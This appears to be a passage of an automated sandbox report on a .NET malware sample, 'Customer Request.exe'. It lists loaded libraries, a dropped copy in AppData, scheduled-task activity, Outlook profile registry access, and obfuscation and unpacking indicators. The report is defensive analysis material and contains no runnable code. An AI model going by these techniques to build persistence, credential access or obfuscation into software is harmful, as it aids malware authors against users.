                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: slc.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: sppc.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: rasman.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\Desktop\Customer Request.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\Customer Request.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Customer Request.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Customer Request.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Customer Request.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: rqSA.pdbSHA256 source: Customer Request.exe, gCFuOglEso.exe.0.dr
                  Source: Binary string: rqSA.pdb source: Customer Request.exe, gCFuOglEso.exe.0.dr

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: Customer Request.exe, Form4.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                  Source: gCFuOglEso.exe.0.dr, Form4.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, frwa3jjtrF5QwZLvOa.cs.Net Code: W2WYTa9Jtm System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, frwa3jjtrF5QwZLvOa.cs.Net Code: W2WYTa9Jtm System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Customer Request.exe.7460000.4.raw.unpack, RK.cs.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, frwa3jjtrF5QwZLvOa.cs.Net Code: W2WYTa9Jtm System.Reflection.Assembly.Load(byte[])
                  Source: Customer Request.exeStatic PE information: 0xAADB355B [Sun Oct 31 23:59:23 2060 UTC]
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_012C24B9 push 8BFFFFFFh; retf 10_2_012C24BF
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_012C24F8 push cs; ret 10_2_012C24FF
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_06C958C9 push es; iretd 10_2_06C958CC
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_06C958DD push es; iretd 10_2_06C958E0
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_06C95895 push es; iretd 10_2_06C958C8
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_06C95849 push es; iretd 10_2_06C95854
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_06C95844 push es; iretd 10_2_06C95848
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_06C95855 push es; iretd 10_2_06C9585C
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_06C9586D push es; iretd 10_2_06C95870
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_06C95871 push es; iretd 10_2_06C9587C
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_06C9581D push es; iretd 10_2_06C95820
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_06C95815 push es; iretd 10_2_06C9581C
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_06C95821 push es; iretd 10_2_06C95824
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D046F1 push ecx; iretd 11_2_06D046F2
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D057F1 pushfd ; iretd 11_2_06D057F2
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D047F9 push edx; iretd 11_2_06D047FA
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D04791 push edx; iretd 11_2_06D04792
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D04070 push eax; iretd 11_2_06D04072
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D041DF push eax; iretd 11_2_06D041E2
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D041E3 push eax; iretd 11_2_06D041EA
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D041B9 push eax; iretd 11_2_06D041BA
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D04119 push eax; iretd 11_2_06D0411A
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D04ED8 push esi; iretd 11_2_06D04EDA
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D04E89 push esi; iretd 11_2_06D04E8A
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D04CB9 push ebp; iretd 11_2_06D04CBA
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D04DE1 push esi; iretd 11_2_06D04DE2
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D04AC8 push esp; iretd 11_2_06D04ACA
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D04AA1 push esp; iretd 11_2_06D04AA2
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D04A48 push esp; iretd 11_2_06D04A4A
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D04A00 push ebx; iretd 11_2_06D04A02
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D04A03 push ebx; iretd 11_2_06D04A0A
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, nwa3brccgEIZB7CI0Yl.csHigh entropy of concatenated method names: 'u9cSeX3WEQ', 'b8LSzlTOAc', 'oP025LniZm', 'XTY2c9pYTy', 'htI2n9xkHM', 'NCO2P87bGf', 'YnZ2YKPHlq', 'aMw2I3XZRP', 'vsr2uqGq4f', 'nPo26gq66F'
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, U6b0Q7eVMSchg0E0I1.csHigh entropy of concatenated method names: 'ySQSaxnYuG', 'DbnSr5iCl5', 'NmmSybifIw', 'WgcS019Esb', 'BDqS8385GS', 'LW4Sj4X3gn', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, zTcnkLHLej3bfwggl5.csHigh entropy of concatenated method names: 'dQNrhNstWE', 'pperM4rk1q', 'ccOa12nvqU', 'PjlaoIyYsZ', 'E3TaF9jsJ9', 'jZaatET0hq', 'c2GaRaI1sZ', 'wunaQIJuLD', 'GeRainDDCE', 'gOaabXA1Is'
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, frwa3jjtrF5QwZLvOa.csHigh entropy of concatenated method names: 'EAYPILJFaE', 'sABPu5lPI8', 'CvuP6yMuvL', 'aOEPaO0X8Y', 'fHoPrF9Mac', 'MLnPyJoaQR', 'BUvP0sypIR', 'GgbPjmdtFr', 'MtsPLhdEgD', 'N4dPfDvhmI'
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, MKTCX2WxWtgjxOuELw.csHigh entropy of concatenated method names: 'pCKyItwBiL', 'O1Uy6jlNXO', 'NF5yrD8ORo', 'Xvcy00W9bl', 'iFKyjRD0D0', 'xTcrVl4JgE', 'ke0rNvSQaZ', 'KxurxGPpfZ', 'rParBknmXA', 'keirmAHEvu'
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, ae0uF1mjLay0CmtTyL.csHigh entropy of concatenated method names: 'Dn08WiZOBj', 'VOg8laJbJD', 'B4c81gh8Tn', 'ESg8oLpE8B', 'UKJ8Ff4x2v', 'aLe8t8uwHI', 'i1u8Re4S1Y', 'l6f8QatBgg', 'XwD8i1wCNH', 'zkY8b8NEXb'
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, Yj3H6mYy1Ppbqq7ICB.csHigh entropy of concatenated method names: 'sqqc0qMLXp', 'g8acjnp44v', 'LobcfPJH1i', 'zO5cJgTTcn', 'xggc9l5iKT', 'nX2cKxWtgj', 'fFkKLklBuSt4kUtSsM', 'fuv58yiQhrJGZxxk1C', 'rVJccJvRRD', 'W5NcPaLqVh'
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, voPa4KNBAHLu7NiUhY.csHigh entropy of concatenated method names: 'iAGOBpnepM', 'r5QOe4Vymd', 'aBm35XyCUB', 'JLw3cxy2Rb', 'JSLO7bftSD', 'AYgOZ8LEPb', 'QriOGPwdII', 'EHVOsWwhtR', 'Cw0OEepUaq', 'Ib6OkZ8qAh'
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, eigfv4x9C1nfUEfUG5.csHigh entropy of concatenated method names: 'f6G89siqHV', 'ers8Osmx04', 'PAO88eFEcV', 'eUm82d5W6Y', 'Dtn8XlL45i', 'W7w8UpTBBs', 'Dispose', 'UTu3uKKAij', 'nA436uVP10', 'G3q3a7Ljmt'
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, l3KgVTaQOpQLbPQ7Vd.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'CVwnmXGfuk', 'uxgneF3sGS', 'o7wnz2B7rS', 'YCNP5lkVF3', 'Q5pPcGFem1', 'Ww0Pnm4ANC', 'jYNPPC2ETv', 'NhDcgnRafqyVPlIpU3d'
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, TZrpZ4RP1a6x3HlVwy.csHigh entropy of concatenated method names: 'rtQ0uG5eT3', 'nCc0aWAEjc', 'Sq40yFHxZE', 'Vi6yesWZyG', 'DAayztlnSm', 'dnL05ILylX', 'C5u0cXtp9A', 'H3a0nxd0rC', 'VsH0Pkf7R1', 'jC20YfaaNR'
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, eF83cRcY6Eg33QpsSPn.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NhxA8x9o7C', 'X84ASdUKf6', 'Fb4A2J5B6f', 'I9HAAmKiiq', 'Ty6AXswBQF', 'rT3ADASovC', 'ePnAUq3uS0'
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, EqMLXp468anp44vyd9.csHigh entropy of concatenated method names: 'SxT6s0AFmK', 'HAB6Ei0QYN', 'k4x6kna052', 'eSd6pbsEx2', 'Oiw6Vx07w0', 'XOH6N5K9u2', 'gom6xPHbc4', 'QuH6BgpFGx', 'j3x6mwfccC', 'DAV6ecNQyL'
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, pgNG05o8KRp2IrkESO.csHigh entropy of concatenated method names: 'fePyUy3x0c', 'WLAywjqVtq', 'HRYyTeIkv3', 'ftryvhj1y4', 'i9fyg50XNo', 'zdeyMsPEvE', 'm28yqb7jHc', 'gkOyHPTKeQ', 'IxnTM1FbxaTKR26JOCM', 'rP2QssF3lQD00dffJw3'
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, LSj5QTGLmePXRUoOpu.csHigh entropy of concatenated method names: 'Y1IC4e9TMO', 'I3QCq412j9', 'W00CWTs1pm', 'BYHClXoFs7', 'GAGCoEQ17R', 'gh0CFrOe7s', 'vUWCR9TuP4', 'nn0CQlcS8h', 'YemCbakB7c', 'ET2C7Tx0BK'
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, lpRipOnrG8qpZxZ10k.csHigh entropy of concatenated method names: 'LjqTceHBW', 'NJevmCc7Z', 'SPhgHdISO', 'apwMesxvG', 'UX9q6qMul', 'RxUHIW8s3', 'QeDpaTrEuoVoVwiTZ8', 'bGViOJddVf9Emfyphw', 'yIt3fkshy', 'ORYSv1xNC'
